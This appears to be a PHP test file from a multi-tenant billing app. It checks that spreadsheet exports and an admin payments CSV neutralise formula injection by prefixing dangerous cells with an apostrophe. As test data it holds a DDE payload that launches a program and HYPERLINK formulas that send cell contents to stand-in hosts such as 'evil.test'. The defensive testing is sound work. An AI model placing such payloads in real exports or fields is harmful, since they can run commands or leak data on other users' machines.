<?php

declare(strict_types=1);

use App\Modules\Admin\Support\PaymentsCsv;
use App\Modules\Billing\Models\Payment;
use App\Modules\Identity\Models\Organization;
use App\Modules\Integrations\Services\Spreadsheets\SpreadsheetWriter;

/*
 * Security review (docs/build/SECURITY_REVIEW.md) S-07: CSV/XLSX formula injection. Organization
 * names and references are typed by other tenants; a cell that starts with a formula trigger
 * (= + - @, and tab or carriage return, which spreadsheet apps strip before evaluating) must be
 * written as text, in the dashboard exports and in the admin payments CSV.
 */

it('neutralises the tab and carriage-return formula triggers in dashboard exports', function (string $value) {
    expect(SpreadsheetWriter::guard($value))->toBe("'".$value);
})->with([
    "\t=HYPERLINK(\"http://evil\")",
    "\r=cmd|' /C calc'!A0",
    '=1+1',
    '+1+1',
    '-1+1',
    '@SUM(A1)',
]);

it('neutralises formulas in the admin payments CSV', function () {
    $organization = Organization::factory()->create(['name' => '=HYPERLINK("http://evil.test/?"&A1,"Open")']);
    $payment = Payment::factory()->succeeded()->create([
        'organization_id' => $organization->id,
        'manual_reference' => '@SUM(1+1)',
    ]);

    $row = PaymentsCsv::row($payment->load('organization'));

    expect($row[2])->toBe('\'=HYPERLINK("http://evil.test/?"&A1,"Open")')
        ->and($row[16])->toBe("'@SUM(1+1)")
        // Amounts and ids are generated by the platform and stay as they are.
        ->and($row[0])->toBe($payment->public_id)
        ->and($row[11])->toMatch('/^\d+\.\d{2}$/');
});
